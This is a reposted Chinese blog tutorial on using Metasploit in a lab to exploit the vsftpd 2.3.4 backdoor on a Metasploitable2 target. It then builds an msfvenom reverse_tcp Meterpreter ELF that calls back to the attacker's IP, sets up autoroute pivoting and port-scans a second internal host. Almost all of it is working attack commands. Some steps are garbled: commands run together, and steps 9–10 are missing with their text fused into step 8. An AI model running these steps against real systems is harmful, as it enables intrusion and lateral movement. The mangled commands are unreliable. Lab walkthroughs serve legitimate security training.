渗透之——Metasploit攻击VSFTPD2.3.4后门漏洞并渗透内网(简述使用metasploit进行漏洞攻击的步骤)

网友投稿 487 2022-10-02


渗透之——Metasploit攻击VSFTPD2.3.4后门漏洞并渗透内网(简述使用metasploit进行漏洞攻击的步骤)

攻击机:Kali 192.168.109.137

靶机:Metasploitable2 192.168.109.140

内网另一主机: Metasploitable2 192.168.109.159

工具:Metasploit

1.开启MSF

msfconsole

2.扫描指定主机的服务和端口

nmap -sV -p 21,22,25,80,110,443,445 192.168.109.140

如果要存入MSF的数据库,则:

db_nmap -sV -p 21,22,25,80,110,443,445 192.168.109.140

3.列出在目标端口上运行的服务

services

4.过滤服务,只显示开启的服务

services -u

5.列出数据库中所有的主机

hosts

6.漏洞攻击

use exploit/unix/ftp/vsftpd_234_backdoorshow optionsset RHOST 192.168.109.140set RPORT 21show payloadsset payload cmd/unix/interactexploit

注:所有操作都是在MSF终端下

这里,我们继续将Shell控制升级为Meterpreter命令行。

在攻击机Kali上重新开启一个终端:

7.生成反弹木马

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST 192.168.109.137 LPORT 4444 -f elf > backdoor.elf

注:elf是Linux系统下的默认扩展名

8.启动Kali上的Apache服务,并将backdoor.elf放置到服务器中

service apache2 startmv backdoor.elf /var/exploit/multi/handlerset payload linux/x86/meterpreter/reverse_tcpset LHOST 192.168.109.137set LPORT 4444exploit

11.在目标机上运行木马文件

切换到第6步的终端,执行命令:

chmod 7777 backdoor.elf./backdoor.elf

12.查看反弹的Meterpreter终端

回到新开启的终端上查看,此时,我们看到已经反弹回Meterpreter命令行了。

接下来,就可以在Meterpreter终端进行操作了。

下面,我们渗透内部网络。

13. 查看ARP内容

arp

由输出可以看出,内网中有另一主机IP地址为:192.168.109.159

为了渗透进入这个内部网络,需要在成功渗透的主机上使用autoroute命令来设置跳板。

14.设置跳板

在Meterpreter终端执行:

run autoroute -prun autoroute -s 192.168.109.0 255.255.255.0run autoroute -p

此时,我们的MSF就可以通过这个Meterpreter会话连接到内部网络。

15.将Meterpreter会话切换到后台

background

接下来就对这个网络中IP地址为192.168.109.159的主机使用auxiliary/scanner/portscan/tcp辅助模块进行一次端口扫描

16.对内网主机192.168.109.159进行端口扫描

use auxiliary/scanner/portscan/tcpshow optionssetg RHOSTS 192.168.109.159run

注意:设置RHOSTS的值时,这里使用的是setg命令,这样就会使RHOSTS的值设置为全局的192.168.109.159,从而无需反复输入这个命令。

由输出可知,在192.168.109.159上运行着很多服务,而且80端口是开放的。接下来使用auxiliary/scanner/80端口运行的服务

use auxiliary/scanner/optionsset RHOSTS 192.168.109.159run

由输出可知,在主机80端口上运行的是Apache2.2.8服务器,其中的PHP 5.2.4版本是存在漏洞的,可以被攻击者获取对目标系统的控制。


版权声明:本文内容由网络用户投稿,版权归原作者所有,本站不拥有其著作权,亦不承担相应法律责任。如果您发现本站中有涉嫌抄袭或描述失实的内容,请联系我们jiasou666@gmail.com 处理,核实后本网站将在24小时内删除侵权内容。

上一篇:渗透之——Metasploit-Meterpreter Shell信息收集相关的命令(渗透与透露)
下一篇:使用springmvc的controller层获取到请求的数据方式
相关文章

 发表评论

暂时没有评论,来抢沙发吧~